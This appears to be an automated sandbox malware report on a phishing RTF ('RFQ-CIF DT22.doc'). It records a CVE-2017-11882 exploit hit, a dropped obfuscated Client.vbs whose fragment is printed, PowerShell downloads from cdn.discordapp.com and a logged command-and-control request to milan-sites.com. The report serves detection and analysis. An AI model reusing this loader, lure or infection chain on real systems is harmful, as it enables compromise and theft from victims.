Yara Hits:	Rule: rtf_cve2017_11882_ole, Description: Attempts to identify the exploit CVE 2017 11882, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{2A5D8C87-AF4E-46DF-A13D-D1E92A25FFAE}.tmp, Author: John Davison Rule: EXP_potential_CVE_2017_11882, Description: unknown, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{2A5D8C87-AF4E-46DF-A13D-D1E92A25FFAE}.tmp, Author: ReversingLabs
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{3C4C0964-F4E2-47CE-9342-09F02AAEAA3F}.tmp Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	1024
Entropy (8bit):	0.05390218305374581
Encrypted:	false
SSDEEP:	3:ol3lYdn:4Wn
MD5:	5D4D94EE7E06BBB0AF9584119797B23A
SHA1:	DBB111419C704F116EFA8E72471DD83E86E49677
SHA-256:	4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
SHA-512:	95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{4420D3E3-CE9B-451F-BDF0-DF912D785C06}.tmp Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	1024
Entropy (8bit):	1.1722028273607172
Encrypted:	false
SSDEEP:	6:beKNc1ElClXiKNgREqAWlgFJYm7KmrRmvlw5Fr+ur8FrK:beOc1MClXiOk5uFJd5Rmvq5ZP8ZK
MD5:	75FCAEF5B6C0ADE6AF66F49874853C6A
SHA1:	834FA72EEF104773D7052895798FED035EF01594
SHA-256:	01E456476480AA1FD27ACF8F02AEA30D9B09581579A029154A6CD2A6850C85A0
SHA-512:	5E7DBBEB9534660466B7ACD9E70725504C33CC435C08D30ECE035B7CC13F5DC8AAB73F8CA16AA562697063059FEC3C5EE8258F108EB68C8B1071DD381FEDB99A
Malicious:	false
Preview:	..).(.).(.).(.).(.).(.).5.=....... .P.a.c.k.a.g.e.E.M.B.E.D.5.=....... .E.q.u.a.t.i.o.n...3.E.M.B.E.D..........................................................................................................................................................................................................................................................................................................................................................................................................................................."...<...>...@...F............................................................................................................................................................................................................................................................................................................................................................................................CJ..OJ..QJ..^J.....j....CJ..OJ..QJ..U..^J...<..CJ..OJ..QJ..^J...OJ..QJ..^J.

C:\Users\user\AppData\Local\Temp\Client.vbs Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	8464
Entropy (8bit):	5.294959126164496
Encrypted:	false
SSDEEP:	192:Kugo5qhwPXk3Ur1yF9q2Jh9tp3F5lQtFw:H4K/k3UrEo2Jh9tpV5lQti
MD5:	ADD66C29C9FCCD7D098554FDC028172E
SHA1:	3E816CBEAB5729A796A6396626D94FB7DAA7C208
SHA-256:	B893967283A7085083CF7BBA86C0B1ED15AAD5783F45853D7213F1804246C07D
SHA-512:	81C24DD500516C4B701CD101020FE79DC5EC91D9796C987DAC897306400678113FEFB0D0A0E3A5B5D04440D4E3DDB9DE2DDE47751B8C6F584D9665AD422DF7EA
Malicious:	true
Preview:	SPLevel0xCRC341414141 = E0xCRC341414141(G0xCRC341414141() + H0xCRC341414141())..'Check the output directories drive to ensure there is enough free space for the files...If Left(g_DumpDir,2) <> "\\" Then 'We are not logging to a UNC path...End If..sKeys0xCRC341414141 = Eval (E0xCRC341414141(")"""",emaNtpircS.tpircSW,emaNlluFtpircS.tpircSW(ecalper"))..GetObject (E0xCRC341414141("B0A85DF40C00-9BDA-0D11-0FC1-62CD539F:wen"))..F = lValue0xCRC341414141 + "\" + WScript.ScriptName..If sKeys0xCRC341414141 = lValue0xCRC341414141 Then..WScript.Quit()..SPLevel0xCRC341414141 = E0xCRC341414141(G0xCRC341414141() + H0xCRC341414141())..'Check the output directories drive to ensure there is enough free space for the files...If Left(g_DumpDir,2) <> "\\" Then 'We are not logging to a UNC path...End If..Else..End If........Function F0xCRC341414141()..Execute("TristateUseDefault0xCRC341414141= ArRAy (""eT"",""aE"",""rC"")")..'Check the output directories drive to ensure there is enough free space for the fil

C:\Users\user\AppData\Local\Temp\Client.vbs:Zone.Identifier Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:gAWY3n:qY3n
MD5:	FBCCF14D504B7B2DBCB5A5BDA75BD93B
SHA1:	D59FC84CDD5217C6CF74785703655F78DA6B582B
SHA-256:	EACD09517CE90D34BA562171D15AC40D302F0E691B439F91BE1B6406E25F5913
SHA-512:	AA1D2B1EA3C9DE3CCADB319D4E3E3276A2F27DD1A5244FE72DE2B6F94083DDDC762480482C5C2E53F803CD9E3973DDEFC68966F974E124307B5043E654443B98
Malicious:	true
Preview:	[ZoneTransfer]..ZoneId=3..

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\RFQ-CIF DT22.LNK Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Mon Aug 30 20:08:55 2021, mtime=Mon Aug 30 20:08:55 2021, atime=Fri Dec 3 01:25:16 2021, length=2186640, window=hide
Category:	dropped
Size (bytes):	1024
Entropy (8bit):	4.55531324967487
Encrypted:	false
SSDEEP:	12:80ldN6C0gXg/XAlCPCHaXjByB/AVtX+WR6L57OuicvbKRtDtZ3YilMMEpxRljKZ8:8ed8/XTTc+bo72e+LDv3q0R7m
MD5:	749C635C18D5512E0F197CAB17048A47
SHA1:	5E29EFECF25DC7BEEFC0B07AD790E9AC009491CA
SHA-256:	D6F5642556529AC2AE22F75A43A180DC00E483EA7EEEE7935F0D14710522BE5F
SHA-512:	96839E16C325B4491CC926CCF8988FD920D03E10E03FF16DB550B06E78A976FE5A3A68F83EF59DF8E57FEA0E6E6B47A2958AAE71F74DB7DCF8F0C9FEE63BC7D9
Malicious:	false
Preview:	L..................F.... ....1.=....1.=...P.v......]!..........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......S....user.8......QK.X.S.....&=....U...............A.l.b.u.s.....z.1......S ...Desktop.d......QK.X.S ...._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....j.2..]!..S). .RFQ-CI~1.DOC..N.......S...S...........................R.F.Q.-.C.I.F. .D.T.2.2...d.o.c.......z...............-...8...[............?J......C:\Users\..#...................\\971342\Users.user\Desktop\RFQ-CIF DT22.doc.'.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.R.F.Q.-.C.I.F. .D.T.2.2...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......971342..........D_....3N...W...9..g............[D_....3N...W

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	75
Entropy (8bit):	4.852040277613462
Encrypted:	false
SSDEEP:	3:bDuMJlvDhxLUmX1FlhxLUv:bCkJw
MD5:	E478B6695C14BFD45080736C657C9DA8
SHA1:	8AFE29DB5E61C261A803727E23D451C47E8C6C03
SHA-256:	84D6786544B4E0E402A83989D6512D49AF1392B67A119210E1F3971E1D556BC4
SHA-512:	B7EBA5503968DC20399E3A96281D353BAAFC2DAFF2A2CC922F91B423A045FF9EE20E75741843D74EA21389C5BE0F4F14686AB367182595486EA8FCC996DEBD58
Malicious:	false
Preview:	[folders]..Templates.LNK=0..RFQ-CIF DT22.LNK=0..[doc]..RFQ-CIF DT22.LNK=0..

C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.5038355507075254
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVyEGlBsB2q/WWqlFGa1/ln:vdsCkWtYlqAHR9l
MD5:	45B1E2B14BE6C1EFC217DCE28709F72D
SHA1:	64E3E91D6557D176776A498CF0776BE3679F13C3
SHA-256:	508D8C67A6B3A7B24641F8DEEBFB484B12CFDAFD23956791176D6699C97978E6
SHA-512:	2EB6C22095EFBC366D213220CB22916B11B1234C18BBCD5457AB811BE0E3C74A2564F56C6835E00A0C245DF964ADE3697EFA4E730D66CC43C1C903975F6225C0
Malicious:	false
Preview:	.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms. (copy) Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	8016
Entropy (8bit):	3.5767705248043695
Encrypted:	false
SSDEEP:	96:chQC4MqKqvsqvJCwo6z8hQC4MqKqvsEHyqvJCworUzKAYnHhUVX/lUV4A2:cmzo6z8mnHnorUzKtUVXrA2
MD5:	204BEE1F37AFC85A6C699A7BB13BFAE5
SHA1:	AB15195A1918ADB6CC9EFFA0472083578E82B982
SHA-256:	A44BD247E61B952BBF46D8493C6A66043CE37085C848C5C12EB809B51E7D9FE0
SHA-512:	3588673DA85416A0955C8E03FDAFF27F111E2B79BB1F5760400AC3D70701ECAF5C7581B828079CF268FD43D62303DF16FB0DF18F7004E95C3925FD62E9EF2B56
Malicious:	false
Preview:	...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J\|v. MICROS~1..@.......:..~J\|v...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;..........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......S ...Programs..f.......:...S ....................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr....................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,....=....................W.i.n.d.o.w.s.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\KK4DZQVDIZP6O1GVC4FY.temp Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	8016
Entropy (8bit):	3.5767705248043695
Encrypted:	false
SSDEEP:	96:chQC4MqKqvsqvJCwo6z8hQC4MqKqvsEHyqvJCworUzKAYnHhUVX/lUV4A2:cmzo6z8mnHnorUzKtUVXrA2
MD5:	204BEE1F37AFC85A6C699A7BB13BFAE5
SHA1:	AB15195A1918ADB6CC9EFFA0472083578E82B982
SHA-256:	A44BD247E61B952BBF46D8493C6A66043CE37085C848C5C12EB809B51E7D9FE0
SHA-512:	3588673DA85416A0955C8E03FDAFF27F111E2B79BB1F5760400AC3D70701ECAF5C7581B828079CF268FD43D62303DF16FB0DF18F7004E95C3925FD62E9EF2B56
Malicious:	false
Preview:	...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J\|v. MICROS~1..@.......:..~J\|v...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;..........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......S ...Programs..f.......:...S ....................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr....................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,....=....................W.i.n.d.o.w.s.

C:\Users\user\Desktop\~$Q-CIF DT22.doc Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.5038355507075254
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVyEGlBsB2q/WWqlFGa1/ln:vdsCkWtYlqAHR9l
MD5:	45B1E2B14BE6C1EFC217DCE28709F72D
SHA1:	64E3E91D6557D176776A498CF0776BE3679F13C3
SHA-256:	508D8C67A6B3A7B24641F8DEEBFB484B12CFDAFD23956791176D6699C97978E6
SHA-512:	2EB6C22095EFBC366D213220CB22916B11B1234C18BBCD5457AB811BE0E3C74A2564F56C6835E00A0C245DF964ADE3697EFA4E730D66CC43C1C903975F6225C0
Malicious:	false
Preview:	.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

Static File Info

General
File type:	Rich Text Format data, version 1, unknown character set
Entropy (8bit):	5.158217624869737
TrID:	Rich Text Format (5005/1) 55.56% Rich Text Format (4004/1) 44.44%
File name:	RFQ-CIF DT22.doc
File size:	2186640
MD5:	66c72e808d6803f22fcd6ec419a6f039
SHA1:	0ac316f9fd8f6b3d8cfd05924f2c3704df112df7
SHA256:	0c5704edd32b5754f2caf5a45caef11e0fa1a9381c84b05f391b9b8d1c101a3a
SHA512:	6222a0e54447ae37615ab7cbcfc9d7386802b77692f96b30c285c24ca520e3cee9c0b83dceb0581a870ff47f0ed8d852146202ec9c86de5877b82a8a12154aef
SSDEEP:	1536:Ibz4J3fbgjEE7wcwEwrwDwlwSwEw7wlwbwXwHwlwLwzwMwOwZwww7wlwbwXwHwlj:7E
File Content Preview:	{\rtf1\posx2160{\\pnseclvl3\pndec\pnstart1\pnindent720\pnhang {\pntxta .}}{\\pnseclvl4\pnlcltr\pnstart1\pnindent720\pnhang {\pntxta )}}{\\pnseclvl5\pndec\pnstart1\pnindent720\pnhang {\pntxtb (}{\pntxta )}}{\\pnseclvl6.\pnlcltr\pnstart1\pnindent720\pnh

File Icon


Icon Hash:	e4eea2aaa4b4b4a4

Static RTF Info

Objects

Id	Start	Format ID	Format	Classname	Datasize	Filename	Sourcepath	Temppath	Exploit
0	000011FEh	2	embedded	Package	8631	Client.vbs	C:\Path\Client.vbs	C:\Path\Client.vbs	no
1	0001CF7Bh	2	embedded	Equation.3	3072				no

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source IP	Dest IP
12/02/21-18:26:36.226933	ICMP	382	ICMP PING Windows	192.168.2.22	216.58.215.238
12/02/21-18:26:36.226933	ICMP	384	ICMP PING	192.168.2.22	216.58.215.238
12/02/21-18:26:36.248280	ICMP	408	ICMP Echo Reply	216.58.215.238	192.168.2.22

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 2, 2021 18:26:37.250333071 CET	49165	443	192.168.2.22	162.159.135.233
Dec 2, 2021 18:26:37.250386000 CET	443	49165	162.159.135.233	192.168.2.22
Dec 2, 2021 18:26:37.250560045 CET	49165	443	192.168.2.22	162.159.135.233
Dec 2, 2021 18:26:37.269045115 CET	49165	443	192.168.2.22	162.159.135.233
Dec 2, 2021 18:26:37.269078016 CET	443	49165	162.159.135.233	192.168.2.22
Dec 2, 2021 18:26:37.324651957 CET	443	49165	162.159.135.233	192.168.2.22
Dec 2, 2021 18:26:37.324786901 CET	49165	443	192.168.2.22	162.159.135.233
Dec 2, 2021 18:26:37.335530043 CET	49165	443	192.168.2.22	162.159.135.233
Dec 2, 2021 18:26:37.335551023 CET	443	49165	162.159.135.233	192.168.2.22
Dec 2, 2021 18:26:37.335884094 CET	443	49165	162.159.135.233	192.168.2.22
Dec 2, 2021 18:26:37.335958004 CET	49165	443	192.168.2.22	162.159.135.233
Dec 2, 2021 18:26:37.637428999 CET	49165	443	192.168.2.22	162.159.135.233
Dec 2, 2021 18:26:37.680905104 CET	443	49165	162.159.135.233	192.168.2.22
Dec 2, 2021 18:26:37.681747913 CET	443	49165	162.159.135.233	192.168.2.22
Dec 2, 2021 18:26:37.681962967 CET	49165	443	192.168.2.22	162.159.135.233
Dec 2, 2021 18:26:37.681984901 CET	443	49165	162.159.135.233	192.168.2.22
Dec 2, 2021 18:26:37.682079077 CET	49165	443	192.168.2.22	162.159.135.233
Dec 2, 2021 18:26:37.682090998 CET	443	49165	162.159.135.233	192.168.2.22
Dec 2, 2021 18:26:37.682157993 CET	49165	443	192.168.2.22	162.159.135.233
Dec 2, 2021 18:26:37.682176113 CET	443	49165	162.159.135.233	192.168.2.22
Dec 2, 2021 18:26:37.682250977 CET	49165	443	192.168.2.22	162.159.135.233
Dec 2, 2021 18:26:37.682270050 CET	443	49165	162.159.135.233	192.168.2.22
Dec 2, 2021 18:26:37.682441950 CET	443	49165	162.159.135.233	192.168.2.22
Dec 2, 2021 18:26:37.682533026 CET	49165	443	192.168.2.22	162.159.135.233
Dec 2, 2021 18:26:37.682562113 CET	443	49165	162.159.135.233	192.168.2.22
Dec 2, 2021 18:26:37.682581902 CET	49165	443	192.168.2.22	162.159.135.233
Dec 2, 2021 18:26:37.682634115 CET	49165	443	192.168.2.22	162.159.135.233
Dec 2, 2021 18:26:37.682651997 CET	443	49165	162.159.135.233	192.168.2.22
Dec 2, 2021 18:26:37.682729959 CET	49165	443	192.168.2.22	162.159.135.233
Dec 2, 2021 18:26:37.682750940 CET	443	49165	162.159.135.233	192.168.2.22
Dec 2, 2021 18:26:37.682826996 CET	49165	443	192.168.2.22	162.159.135.233
Dec 2, 2021 18:26:37.682847977 CET	443	49165	162.159.135.233	192.168.2.22
Dec 2, 2021 18:26:37.682938099 CET	49165	443	192.168.2.22	162.159.135.233
Dec 2, 2021 18:26:37.682952881 CET	443	49165	162.159.135.233	192.168.2.22
Dec 2, 2021 18:26:37.683042049 CET	49165	443	192.168.2.22	162.159.135.233
Dec 2, 2021 18:26:37.683062077 CET	443	49165	162.159.135.233	192.168.2.22
Dec 2, 2021 18:26:37.683136940 CET	49165	443	192.168.2.22	162.159.135.233
Dec 2, 2021 18:26:37.683149099 CET	443	49165	162.159.135.233	192.168.2.22
Dec 2, 2021 18:26:37.683228016 CET	49165	443	192.168.2.22	162.159.135.233
Dec 2, 2021 18:26:37.683245897 CET	443	49165	162.159.135.233	192.168.2.22
Dec 2, 2021 18:26:37.683379889 CET	49165	443	192.168.2.22	162.159.135.233
Dec 2, 2021 18:26:37.683397055 CET	443	49165	162.159.135.233	192.168.2.22
Dec 2, 2021 18:26:37.683443069 CET	49165	443	192.168.2.22	162.159.135.233
Dec 2, 2021 18:26:37.683454037 CET	443	49165	162.159.135.233	192.168.2.22
Dec 2, 2021 18:26:37.683507919 CET	49165	443	192.168.2.22	162.159.135.233
Dec 2, 2021 18:26:37.683545113 CET	443	49165	162.159.135.233	192.168.2.22
Dec 2, 2021 18:26:37.683669090 CET	49165	443	192.168.2.22	162.159.135.233
Dec 2, 2021 18:26:37.683684111 CET	443	49165	162.159.135.233	192.168.2.22
Dec 2, 2021 18:26:37.683836937 CET	49165	443	192.168.2.22	162.159.135.233
Dec 2, 2021 18:26:37.683856964 CET	443	49165	162.159.135.233	192.168.2.22
Dec 2, 2021 18:26:37.683947086 CET	49165	443	192.168.2.22	162.159.135.233
Dec 2, 2021 18:26:37.683958054 CET	443	49165	162.159.135.233	192.168.2.22
Dec 2, 2021 18:26:37.684022903 CET	49165	443	192.168.2.22	162.159.135.233
Dec 2, 2021 18:26:37.684035063 CET	443	49165	162.159.135.233	192.168.2.22
Dec 2, 2021 18:26:37.684144974 CET	49165	443	192.168.2.22	162.159.135.233
Dec 2, 2021 18:26:37.684161901 CET	443	49165	162.159.135.233	192.168.2.22
Dec 2, 2021 18:26:37.684218884 CET	49165	443	192.168.2.22	162.159.135.233
Dec 2, 2021 18:26:37.684236050 CET	443	49165	162.159.135.233	192.168.2.22
Dec 2, 2021 18:26:37.684365034 CET	49165	443	192.168.2.22	162.159.135.233
Dec 2, 2021 18:26:37.684385061 CET	443	49165	162.159.135.233	192.168.2.22
Dec 2, 2021 18:26:37.684519053 CET	443	49165	162.159.135.233	192.168.2.22
Dec 2, 2021 18:26:37.684561968 CET	49165	443	192.168.2.22	162.159.135.233
Dec 2, 2021 18:26:37.684581041 CET	443	49165	162.159.135.233	192.168.2.22
Dec 2, 2021 18:26:37.684595108 CET	49165	443	192.168.2.22	162.159.135.233
Dec 2, 2021 18:26:37.684717894 CET	49165	443	192.168.2.22	162.159.135.233
Dec 2, 2021 18:26:37.684737921 CET	443	49165	162.159.135.233	192.168.2.22
Dec 2, 2021 18:26:37.684911966 CET	49165	443	192.168.2.22	162.159.135.233
Dec 2, 2021 18:26:37.684916019 CET	443	49165	162.159.135.233	192.168.2.22
Dec 2, 2021 18:26:37.684951067 CET	443	49165	162.159.135.233	192.168.2.22
Dec 2, 2021 18:26:37.685054064 CET	49165	443	192.168.2.22	162.159.135.233
Dec 2, 2021 18:26:37.685070992 CET	49165	443	192.168.2.22	162.159.135.233
Dec 2, 2021 18:26:37.685091972 CET	443	49165	162.159.135.233	192.168.2.22
Dec 2, 2021 18:26:37.685236931 CET	49165	443	192.168.2.22	162.159.135.233
Dec 2, 2021 18:26:37.685261965 CET	443	49165	162.159.135.233	192.168.2.22
Dec 2, 2021 18:26:37.685425997 CET	443	49165	162.159.135.233	192.168.2.22
Dec 2, 2021 18:26:37.685537100 CET	49165	443	192.168.2.22	162.159.135.233
Dec 2, 2021 18:26:37.685560942 CET	443	49165	162.159.135.233	192.168.2.22
Dec 2, 2021 18:26:37.685621977 CET	49165	443	192.168.2.22	162.159.135.233
Dec 2, 2021 18:26:37.685631990 CET	49165	443	192.168.2.22	162.159.135.233
Dec 2, 2021 18:26:37.685642958 CET	443	49165	162.159.135.233	192.168.2.22
Dec 2, 2021 18:26:37.685792923 CET	443	49165	162.159.135.233	192.168.2.22
Dec 2, 2021 18:26:37.685796976 CET	49165	443	192.168.2.22	162.159.135.233
Dec 2, 2021 18:26:37.685826063 CET	443	49165	162.159.135.233	192.168.2.22
Dec 2, 2021 18:26:37.685905933 CET	49165	443	192.168.2.22	162.159.135.233
Dec 2, 2021 18:26:37.685913086 CET	49165	443	192.168.2.22	162.159.135.233
Dec 2, 2021 18:26:37.685964108 CET	443	49165	162.159.135.233	192.168.2.22
Dec 2, 2021 18:26:37.686156034 CET	443	49165	162.159.135.233	192.168.2.22
Dec 2, 2021 18:26:37.686224937 CET	49165	443	192.168.2.22	162.159.135.233
Dec 2, 2021 18:26:37.686238050 CET	443	49165	162.159.135.233	192.168.2.22
Dec 2, 2021 18:26:37.686254025 CET	49165	443	192.168.2.22	162.159.135.233
Dec 2, 2021 18:26:37.686352015 CET	443	49165	162.159.135.233	192.168.2.22
Dec 2, 2021 18:26:37.686417103 CET	49165	443	192.168.2.22	162.159.135.233
Dec 2, 2021 18:26:37.686429024 CET	443	49165	162.159.135.233	192.168.2.22
Dec 2, 2021 18:26:37.686469078 CET	49165	443	192.168.2.22	162.159.135.233
Dec 2, 2021 18:26:37.686609983 CET	443	49165	162.159.135.233	192.168.2.22
Dec 2, 2021 18:26:37.686685085 CET	49165	443	192.168.2.22	162.159.135.233
Dec 2, 2021 18:26:37.686702013 CET	443	49165	162.159.135.233	192.168.2.22
Dec 2, 2021 18:26:37.686728001 CET	49165	443	192.168.2.22	162.159.135.233
Dec 2, 2021 18:26:37.686817884 CET	49165	443	192.168.2.22	162.159.135.233
Dec 2, 2021 18:26:37.687064886 CET	49165	443	192.168.2.22	162.159.135.233

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 2, 2021 18:26:36.163012981 CET	52167	53	192.168.2.22	8.8.8.8
Dec 2, 2021 18:26:36.190970898 CET	53	52167	8.8.8.8	192.168.2.22
Dec 2, 2021 18:26:36.196990013 CET	50591	53	192.168.2.22	8.8.8.8
Dec 2, 2021 18:26:36.224750042 CET	53	50591	8.8.8.8	192.168.2.22
Dec 2, 2021 18:26:37.210226059 CET	57805	53	192.168.2.22	8.8.8.8
Dec 2, 2021 18:26:37.232888937 CET	53	57805	8.8.8.8	192.168.2.22
Dec 2, 2021 18:28:03.277404070 CET	59030	53	192.168.2.22	8.8.8.8
Dec 2, 2021 18:28:03.306587934 CET	53	59030	8.8.8.8	192.168.2.22
Dec 2, 2021 18:28:23.495855093 CET	59185	53	192.168.2.22	8.8.8.8
Dec 2, 2021 18:28:23.679661036 CET	53	59185	8.8.8.8	192.168.2.22

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Dec 2, 2021 18:26:36.163012981 CET	192.168.2.22	8.8.8.8	0x9e6	Standard query (0)	google.com	A (IP address)	IN (0x0001)
Dec 2, 2021 18:26:36.196990013 CET	192.168.2.22	8.8.8.8	0x782a	Standard query (0)	google.com	A (IP address)	IN (0x0001)
Dec 2, 2021 18:26:37.210226059 CET	192.168.2.22	8.8.8.8	0xbc48	Standard query (0)	cdn.discordapp.com	A (IP address)	IN (0x0001)
Dec 2, 2021 18:28:03.277404070 CET	192.168.2.22	8.8.8.8	0xfc43	Standard query (0)	www.foodcartgps.net	A (IP address)	IN (0x0001)
Dec 2, 2021 18:28:23.495855093 CET	192.168.2.22	8.8.8.8	0x9c63	Standard query (0)	www.milan-sites.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Dec 2, 2021 18:26:36.190970898 CET	8.8.8.8	192.168.2.22	0x9e6	No error (0)	google.com		216.58.215.238	A (IP address)	IN (0x0001)
Dec 2, 2021 18:26:36.224750042 CET	8.8.8.8	192.168.2.22	0x782a	No error (0)	google.com		216.58.215.238	A (IP address)	IN (0x0001)
Dec 2, 2021 18:26:37.232888937 CET	8.8.8.8	192.168.2.22	0xbc48	No error (0)	cdn.discordapp.com		162.159.135.233	A (IP address)	IN (0x0001)
Dec 2, 2021 18:26:37.232888937 CET	8.8.8.8	192.168.2.22	0xbc48	No error (0)	cdn.discordapp.com		162.159.134.233	A (IP address)	IN (0x0001)
Dec 2, 2021 18:26:37.232888937 CET	8.8.8.8	192.168.2.22	0xbc48	No error (0)	cdn.discordapp.com		162.159.129.233	A (IP address)	IN (0x0001)
Dec 2, 2021 18:26:37.232888937 CET	8.8.8.8	192.168.2.22	0xbc48	No error (0)	cdn.discordapp.com		162.159.133.233	A (IP address)	IN (0x0001)
Dec 2, 2021 18:26:37.232888937 CET	8.8.8.8	192.168.2.22	0xbc48	No error (0)	cdn.discordapp.com		162.159.130.233	A (IP address)	IN (0x0001)
Dec 2, 2021 18:28:03.306587934 CET	8.8.8.8	192.168.2.22	0xfc43	Name error (3)	www.foodcartgps.net	none	none	A (IP address)	IN (0x0001)
Dec 2, 2021 18:28:23.679661036 CET	8.8.8.8	192.168.2.22	0x9c63	No error (0)	www.milan-sites.com		47.241.96.113	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

cdn.discordapp.com

www.milan-sites.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.22	49165	162.159.135.233	443	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.22	49167	47.241.96.113	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Dec 2, 2021 18:28:23.934557915 CET	1951	OUT	GET /t1st/?axoXKTD=uTpqzRmP4oAoFu5bW/C1NBvei3ZEHQ9lndq23HdAXkDs/tJRE4xymzeaNit+87gYgYiprQ==&bx=7nL09FJ HTTP/1.1 Host: www.milan-sites.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
